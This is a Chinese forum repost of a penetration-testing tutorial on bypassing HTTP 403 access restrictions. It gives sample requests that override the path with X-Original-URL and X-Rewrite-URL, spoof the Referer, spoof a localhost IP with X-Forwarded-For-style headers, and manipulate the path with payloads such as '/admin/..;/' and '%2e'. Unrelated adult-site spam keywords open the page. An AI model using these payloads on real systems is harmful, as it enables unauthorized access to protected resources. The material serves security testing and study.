女人自慰AV免费观看内涵网,日韩国产剧情在线观看网址,神马电影网特片网,最新一级电影欧美,在线观看亚洲欧美日韩,黄色视频在线播放免费观看,ABO涨奶期羡澄,第一导航fulione,美女主播操b

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

滲透測(cè)試如何利用403頁面

jf_Fo0qk3ln ? 來源:xpshuai.cn ? 2023-01-05 10:11 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x01 前言




做滲透時(shí)經(jīng)常會(huì)碰到掃到的資產(chǎn)403的情況,特別是資產(chǎn)微乎其微的情況下,面試有時(shí)也會(huì)問到,這里做個(gè)總結(jié)!

0x02 利用姿勢(shì)




1.端口利用

掃描主機(jī)端口,找其它開放web服務(wù)的端口,訪問其端口,挑軟柿子。

2.修改HOST

Host在請(qǐng)求頭中的作用:在一般情況下,幾個(gè)網(wǎng)站可能會(huì)部署在同一個(gè)服務(wù)器上,或者幾個(gè)web系統(tǒng)共享一個(gè)服務(wù)器,通過host頭來指定應(yīng)該由哪個(gè)網(wǎng)站或者web系統(tǒng)來處理用戶的請(qǐng)求。而很多WEB應(yīng)用通過獲取HTTP HOST頭來獲得當(dāng)前請(qǐng)求訪問的位置,但是很多開發(fā)人員并未意識(shí)到HTTP HOST頭由用戶控制,從安全角度來講,任何用戶輸入都是認(rèn)為不安全的。

修改客戶端請(qǐng)求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進(jìn)行繞過二級(jí)域名;首先對(duì)該目標(biāo)域名進(jìn)行子域名收集,整理好子域名資產(chǎn)(host字段同樣支持IP地址)。先Fuzz測(cè)試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個(gè)服務(wù)端返回200的狀態(tài)碼,即表面成功找到一個(gè)在HOST白名單中的子域名。我們利用firefox插件來修改HOST值,成功繞過訪問限制。

3.覆蓋請(qǐng)求URL

嘗試使用X-Original-URLX-Rewrite-URL標(biāo)頭繞過Web服務(wù)器的限制。通過支持X-Original-URLX-Rewrite-URL標(biāo)頭,用戶可以使用這倆請(qǐng)求標(biāo)頭覆蓋請(qǐng)求URL中的路徑,嘗試?yán)@過對(duì)更高級(jí)別的緩存和Web服務(wù)器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK


4.Referer標(biāo)頭繞過

嘗試使用Referer標(biāo)頭繞過Web服務(wù)器的限制。

介紹:Referer請(qǐng)求頭包含了當(dāng)前請(qǐng)求頁面的來源頁面的地址,即表示當(dāng)前頁面是通過此來源頁面里的鏈接進(jìn)入的。服務(wù)端一般使用Referer請(qǐng)求頭識(shí)別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK


5.代理IP

一般開發(fā)者會(huì)通過Nginx代理識(shí)別訪問端IP限制對(duì)接口的訪問,嘗試使用X-Forwarded-ForX-Forwared-Host等標(biāo)頭繞過Web服務(wù)器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK


6.擴(kuò)展名繞過

基于擴(kuò)展名,用于繞過403受限制的目錄。


	

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200


7.掃描的時(shí)候 遇到403了,上目錄掃描工具,掃目錄,掃文件(記住,掃描的時(shí)候要打開探測(cè)403,因?yàn)橛行┚W(wǎng)站的目錄沒有權(quán)限訪問會(huì)顯示403,但是在這個(gè)目錄下面的文件,我們或許能掃描到并訪問 )


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    13

    文章

    9793

    瀏覽量

    87943
  • URL
    URL
    +關(guān)注

    關(guān)注

    0

    文章

    141

    瀏覽量

    15862
  • 滲透
    +關(guān)注

    關(guān)注

    0

    文章

    21

    瀏覽量

    6401

原文標(biāo)題:滲透測(cè)試如何利用403頁面

文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    【匯思博SEEK100開發(fā)板試用體驗(yàn)】06 天氣app--使用組件導(dǎo)航實(shí)現(xiàn)設(shè)置頁面跳轉(zhuǎn)

    1 前言 本次要完成組件導(dǎo)航跳轉(zhuǎn)頁面功能,實(shí)現(xiàn)設(shè)置和主頁的跳轉(zhuǎn)。 2 組件導(dǎo)航 (Navigation) 2.1 簡(jiǎn)介 組件導(dǎo)航(Navigation)主要用于實(shí)現(xiàn)頁面間以及組件內(nèi)部的頁面
    發(fā)表于 07-09 16:57

    利用onPageShow實(shí)現(xiàn)返回刷新的操作

    進(jìn)入新增貼子的頁面,然后當(dāng)用戶輸入了內(nèi)容點(diǎn)擊提交后,提示“新增成功”,并返回到列表。那么這時(shí)候,列表要做的就是刷新貼子列表,把剛才新發(fā)布的貼子顯示出來。 或者 這是一個(gè)商品列表
    發(fā)表于 06-30 18:12

    《仿盒馬》app開發(fā)技術(shù)分享-- 用戶登陸頁面(靜態(tài))(20)

    用戶之間的數(shù)據(jù)并不互通,現(xiàn)在為了實(shí)現(xiàn)我們的用戶綁定制度,我們需要給應(yīng)用添加一個(gè)用戶登陸的入口的。 功能分析 用戶登陸頁面的內(nèi)容相對(duì)來說比較簡(jiǎn)單,我們首先要實(shí)現(xiàn)的就是登陸的靜態(tài)頁面,需要展示的內(nèi)容不多
    發(fā)表于 06-30 13:15

    403 Forbidden是什么意思?最佳解決方法有哪些?

    403 Forbidden是什么意思? 403 Forbidden狀態(tài)碼表示當(dāng)客戶端(如瀏覽器)向服務(wù)器發(fā)送請(qǐng)求時(shí),服務(wù)器會(huì)根據(jù)請(qǐng)求的內(nèi)容、來源以及服務(wù)器的配置等因素,返回一個(gè)HTTP狀態(tài)碼,因?yàn)?/div>
    的頭像 發(fā)表于 06-25 16:33 ?645次閱讀

    NC403(C50)高性能噪聲二極管現(xiàn)貨庫存

    NC403(C50)高性能噪聲二極管現(xiàn)貨庫存NC403(C50)是Noisecom推出的一款高性能微波噪聲二極管,專為射頻和微波應(yīng)用設(shè)計(jì)。NC403(C50)采用C50封裝,適用于需要表面貼裝
    發(fā)表于 06-03 10:31

    如何在KaihongOS操作系統(tǒng)中寫一個(gè)動(dòng)態(tài)的頁面

    的轉(zhuǎn)場(chǎng)動(dòng)效等,推薦使用Navigation。 第一個(gè)頁面跳轉(zhuǎn)到第二個(gè)頁面。 在第一個(gè)頁面中,跳轉(zhuǎn)按鈕綁定onClick事件,點(diǎn)擊按鈕時(shí)跳轉(zhuǎn)到第二。Index.ets文件的示例
    發(fā)表于 04-25 06:42

    Allegro Skill布局功能之按擺放器件介紹

    在電路設(shè)計(jì)中,原理圖中常以一個(gè)功能模塊的器件繪制在同一頁面上,因此,通常將器件在pcb按擺放在一起,更方便進(jìn)行模塊化布局。為此,F(xiàn)any skill添加了將pcb中的器件按照原理圖,進(jìn)行分類擺放的功能。需要注意的是,此功能需
    的頭像 發(fā)表于 04-23 17:10 ?697次閱讀
    Allegro Skill布局功能之按<b class='flag-5'>頁</b>擺放器件介紹

    安全檢測(cè) 高效合規(guī) | 經(jīng)緯恒潤(rùn)重磅推出PeneTrix滲透測(cè)試平臺(tái)

    在汽車智能化進(jìn)程加速的今天,汽車電子控制系統(tǒng)(ECU)開發(fā)與信息安全合規(guī)性驗(yàn)證正面臨三重挑戰(zhàn):法規(guī)更新頻繁、威脅場(chǎng)景日益復(fù)雜、傳統(tǒng)滲透測(cè)試流程耗時(shí)費(fèi)力。面對(duì)這些難題,經(jīng)緯恒潤(rùn)基于多年的研發(fā)經(jīng)驗(yàn)與技術(shù)
    的頭像 發(fā)表于 03-17 17:04 ?742次閱讀
    安全檢測(cè) 高效合規(guī) | 經(jīng)緯恒潤(rùn)重磅推出PeneTrix<b class='flag-5'>滲透</b><b class='flag-5'>測(cè)試</b>平臺(tái)

    LED紅墨水測(cè)試

    紅墨水滲透測(cè)試紅墨水滲透測(cè)試(RedDyePenetrationTest),也稱為L(zhǎng)ED紅墨水試驗(yàn),是一種用于評(píng)估電子電路板組裝(PCBAssembly)中表面貼裝技術(shù)(SMT)焊接質(zhì)
    的頭像 發(fā)表于 02-08 12:14 ?721次閱讀
    LED紅墨水<b class='flag-5'>測(cè)試</b>

    GD32F403xx數(shù)據(jù)表

    電子發(fā)燒友網(wǎng)站提供《GD32F403xx數(shù)據(jù)表.pdf》資料免費(fèi)下載
    發(fā)表于 01-22 17:37 ?0次下載
    GD32F<b class='flag-5'>403</b>xx數(shù)據(jù)表

    Web安全之滲透測(cè)試基礎(chǔ)與實(shí)踐

    在網(wǎng)絡(luò)安全領(lǐng)域,Web滲透測(cè)試是發(fā)現(xiàn)Web應(yīng)用漏洞的重要手段。下面介紹滲透測(cè)試的基礎(chǔ)和實(shí)踐。 信息收集是滲透
    的頭像 發(fā)表于 01-22 09:33 ?448次閱讀

    HarmonyOS Web頁面加載的原理和優(yōu)化方法

    在移動(dòng)互聯(lián)網(wǎng)時(shí)代,應(yīng)用的頁面渲染速度對(duì)于用戶體驗(yàn)至關(guān)重要。相對(duì)于原生頁面,Web頁面的性能存在多方面的技術(shù)挑戰(zhàn)。本文以HarmonyOS的ArkWeb組件為基礎(chǔ),介紹了Web頁面加載中
    的頭像 發(fā)表于 12-05 15:14 ?1065次閱讀
    HarmonyOS Web<b class='flag-5'>頁面</b>加載的原理和優(yōu)化方法

    TLV320ADC3101可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,為什么?

    如題,通過csl庫提供的程序,可以正確設(shè)置和讀寫PAGE0的數(shù)據(jù),但是讀取PAGE4上的寄存器值都為0,很奇怪,數(shù)據(jù)手冊(cè)好像也沒有說讀取PAGE4與讀取其他頁面上的寄存器有什么不同,不知道有沒有誰遇到同樣問題,在線等!!!
    發(fā)表于 10-30 08:02

    TFP501、TFP403參考設(shè)計(jì)

    電子發(fā)燒友網(wǎng)站提供《TFP501、TFP403參考設(shè)計(jì).pdf》資料免費(fèi)下載
    發(fā)表于 09-29 09:53 ?0次下載
    TFP501、TFP<b class='flag-5'>403</b>參考設(shè)計(jì)

    Linux內(nèi)核中的頁面分配機(jī)制

    Linux內(nèi)核中是如何分配出頁面的,如果我們站在CPU的角度去看這個(gè)問題,CPU能分配出來的頁面是以物理頁面為單位的。也就是我們計(jì)算機(jī)中常講的分頁機(jī)制。本文就看下Linux內(nèi)核是如何管理,釋放和分配這些物理
    的頭像 發(fā)表于 08-07 15:51 ?638次閱讀
    Linux內(nèi)核中的<b class='flag-5'>頁面</b>分配機(jī)制